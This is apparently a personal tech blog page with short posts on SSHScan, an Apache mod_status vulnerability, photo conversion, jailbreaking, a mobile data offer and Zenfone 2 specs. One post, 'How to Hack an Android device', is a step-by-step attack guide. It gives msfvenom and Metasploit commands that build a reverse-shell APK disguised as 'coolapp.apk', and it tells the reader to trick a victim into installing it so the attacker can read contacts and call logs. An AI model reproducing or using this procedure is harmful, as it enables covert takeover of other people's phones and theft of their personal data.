2

Pentester Tools : SSHScan

Posted by zuhaircmr
    SSHScan is a testing tool that enumerates SSH Ciphers. We Can easily detect weak ciphers by using this .


Lets tryout SSHScan in BrokenWeb (A Vulnerable machine) hosted locally .

Brokenweb IP : 192.168.3.107


codebreaker@zbox:~$ ./SSHScan/sshscan.py -t 192.168.3.107:22



 In Network Pentesting, Once you detect an SSH port , then try for SSHScan to detect the ciphers. If KEX algoritham is weak then an attacker can easily create a Denial of Service attack on SSH port and hence the target wont be accessible by the anyone at the moment.

GITHUB Link:
https://github.com/evict/SSHScan

Installation :
git clone https://github.com/evict/SSHScan 

0

How to save your server from Apache 2.4.7 Vulnerability (mod_status)

Posted by zuhaircmr
If your server is running with an apache 2.4.7 , then the chance for being hacked is high . Listing two solutions to solve this issue .

Description:


An attacker able to access a public server status page on a server using a threaded MPM could send a carefully crafted request which could lead to a heap buffer overflow. Note that it is not a default or recommended configuration to have a public accessible server status page.


Proof:


  • Running HTTP service
  • Product HTTPD exists -- Apache HTTPD 2.4.7
  • Vulnerable version of product HTTPD found -- Apache HTTPD 2.4.7

Vulnerability ID
: apache-httpd-cve-2014-0226

Solution:


0

How to easily convert C2R files to JPEG with UBUNTU

Posted by zuhaircmr
1) sudo apt-get install ufraw
2) cd < directory of cr2 file >
3) for i in *.CR2; do ufraw-batch $i --out-type=jpeg --output $i.jpg; done;

0

How to Hack an Android device on the same Wi-Fi Network

Posted by zuhaircmr
Disclaimer: Hacking other devices on Wireless Networks (Wi-Fi) without explicit written permission is illegal, unless you are the legal owner of the devices you want to hack and the wireless network.
Its just a simple Trick. All you need is our dear metasploit, and a bit of social engineering skills.
Here my ip is 192.168.1.33 and the system i am going to hack is of ip 192.168.1.34
Open a terminal(as root-sudo terminator), and put in:
msfvenom -p android/meterpreter/reverse_tcp LHOST=(your lan ip address) LPORT=8080 R > /home/root/coolapp.apk
eg : msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.33 LPORT=8080 R > /home/root/coolapp.apk 
This command should give you a file called coolapp.apk on the desktop. Now we need to set up a listener so that when the target opens the app, we have their android hacked. :D
Open the metasploit console by typing "msfconsole" & Type : 
use exploit/multi/handler
Hit return and follow as I do 1by1.

set payload android/meterpreter/reverse_tcp
set lhost (your lan ip address)
set lport 8080


Hit enter, Now use some social engineering tricks like sending them a mail or send via  bluetooth to give the file on the desktop titled, coolapp.apk, to someone who will open(click on install>&open) it on their android phone. Once you have given the app and they are about to open it, go back to your metasploit console and type:
exploit
This should open a connection soon with the target android phone where you can access a lot of features of that phone like Contacts,Call log, and many more .



Feel free to comment here if you face any problems .
All the best.



0

JailBreak APPLE iOS 8.1.3

Posted by zuhaircmr in
JailBreaking iOS 8.1.3 is currently an impossible task reported by most of the famous jailbreakers .Eventhough you can have a try with 2 different methods .




1) Download and Install iOS 8.2 Beta and Jailbreak.
2) Downgrade the iOS to 8.1.2.

Be careful while trying the 2 options because at any time apple may stop signing to 8.1.2 & 8.2 beta. so confirm it before restoring .


0

Airtel Hack to get 750MB for 30 Days Validity

Posted by zuhaircmr in ,
Airtel Hack to get 750MB for 30 Days 

Want to get a one month 2G Net 750MB at just rupees 33 ?? 
#Follow the steps below




1) Send a msg  "NET" to 121

   you will get a reply from "unknown number"*but give reply to 121


2)Reply "2" to 121 

3)Reply "00" to 121 for selecting the option more

Option 11 ) 750MB 2G + 150MB @33/15days









4)Reply"11" and confirm the msg by replying "1" to 121


 It will be shown as 15days but after the activation you will get 30 days validity.


0

Asus Zenfone 2

Posted by zuhaircmr in
Asus ZenFone 2 is powered by an up to 2.3 GHz 64-bit Intel Atom processor Z3580 and has 4 GB RAM to deliver up to seven times (7X)* faster gaming performance than its predecessor, so you'll enjoy slick web surfing, smooth video playback, great gaming experiences and multi-tasking that doesn't leave you waiting.



Specification

ZE551ML
Processor 64-bit Intel Atom Z3560/Z3580 Quad Core Processor (Running at 1.8/2.3GHz) PowerVR Series 6 - G6430, with OpenGL 3.0 support

Operating System Brand-new ASUS ZenUI with Android 5.0 Lollipop


Memory Storage LPDDR3 2GB/4GB RAM/Micro SD card support, up to 64GB

16GB/32GB/64GB ROM ASUS WebStorage 5GB (lifetime)


Display 5.5-inch, 1920 x 1080 (Full HD), 403ppi IPS display/400nits brightness/ Corning® Gorilla® Glass 3
PixelMaster Cameras

Front: 5MP, f/2.0-aperture, wide-angle (85-degree) lens with Selfie Panorama
Rear: 13MP, f/2.0-aperture, 5-element, auto-focus lens with dual-color Real Tone flash
PixelMaster features: Low Light mode / Backlight (HDR) mode / Enhanced Beautification mode / Manual mode / Zero shutter lag
Network

LTE speed: Category 4 maximum: 150Mbit/s / DL: 50Mbit/s
4G band: FDD LTE: 1/2/3/4/5/7/8/9/17/18/19/20/28/29
TDD LTE: 38/39/40/41(Network support varies by country)


Battery
3000mAh lithium-polymer, Fast-charging technology
Sensor Accelerometer, proximity, ambient-light, gyroscopic, digital compass and Hall-effect sensors


Navigation
GPS / A-GPS / GLONASS


Wireless
802.11ac, Wi-Fi Direct, Bluetooth 4.0, NFC


Ports
3.5mm audio jack, dual micro-SIM, micro USB (support OTG)


Color
Glacier Gray / Osmium Black / Glamour Red / Ceramic White / Sheer Gold


Dimensions
152.5 x 77.2 x 10.9 ~ 3.9 mm


Weight
170g


Exp.Release on March 2014 .



Copyright © 2009 Topfom All rights reserved. Theme by zuhaircmr. | Bloggerized by topform.

free hit counters